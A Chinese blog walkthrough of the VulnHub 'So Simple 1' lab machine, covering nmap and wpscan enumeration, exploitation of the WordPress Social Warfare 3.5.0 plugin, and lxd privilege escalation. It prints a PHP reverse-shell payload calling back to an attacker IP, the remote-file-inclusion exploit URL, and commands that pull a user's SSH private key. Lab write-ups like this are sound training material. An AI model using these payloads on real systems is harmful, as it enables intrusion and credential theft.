vulnhub-So Simple 1

最新推荐文章于 2023-01-02 21:28:46 发布

赛博雨天

最新推荐文章于 2023-01-02 21:28:46 发布

阅读量1.2k

点赞数

分类专栏： vulnhub 文章标签：安全

本文链接：https://blog.csdn.net/yutianovo/article/details/107907158

版权

vulnhub 专栏收录该内容

23 篇文章 0 订阅

订阅专栏

靶机描述

This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).

The VM is tested on Virtualbox. After the startup it shows the IP address.

Share your rootflag with me on Twitter: @roelvb79

Good luck and have fun!


This works better with VirtualBox rather than VMware

下载 https://www.vulnhub.com/entry/so-simple_1,515/

清单

信息搜集
- namp
- wpscan
提权
- 带有漏洞的插件Social Warfare v3.5.0
- 反弹shell
- lxd组
- 得到 root

信息搜集

靶机IP

端口扫描

nmap -A 192.168.0.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 10:32 CST
Nmap scan report for localhost (192.168.0.105)
Host is up (0.00049s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: So Simple
MAC Address: 08:00:27:83:DF:00 (Oracle VirtualBox virtual NIC)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=41818%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=5F2F603C%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%
OS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=
OS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.50 ms localhost (192.168.0.105)

开放80端口

扫描目录

网站搭建了WordPress

wpscan

扫描器返回带有 3.5.0

搜索相关信息 ¹

得到低权限用户

exp利用

1.在 kali 创建payload.txt

内容为

<pre>
system('php -r \'$sock=fsockopen("192.168.0.109",2233);exec("/bin/sh -i <&3 >&3 2>&3");\'');
</pre>

2.kali开启监听端口

3.访问 http://192.168.0.105/wordpress/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://192.168.0.109:8000/payload.txt

192.168.0.105 为靶机IP

192.168.0.109 为攻击机IP

得到 shell

来到 max 用户下的.ssh

使用python将 id_rsa 传输到 kali 里

wget http://192.168.0.105:8090/id_rsa 下载得到id_rsa

chmod 700 id_rsa 更改权限

ssh -i id_rsa max@192.168.0.105 ssh连接到 max 用户

得到 max 用户对话，可以看到 lxd 用户组²

提权

现在得到了 root目录下的 flag

以及 user2.txt

https://unit42.paloaltonetworks.com/exploits-in-the-wild-for-wordpress-social-warfare-plugin-cve-2019-9978/ ↩︎
https://www.freebuf.com/articles/system/216803.html ↩︎

赛博雨天

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
vulnhub-So Simple 1

靶机描述This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).The VM is tested on Virtualbox. After the startup it shows the IP address.Share your rootflag with me on Twitter
复制链接

扫一扫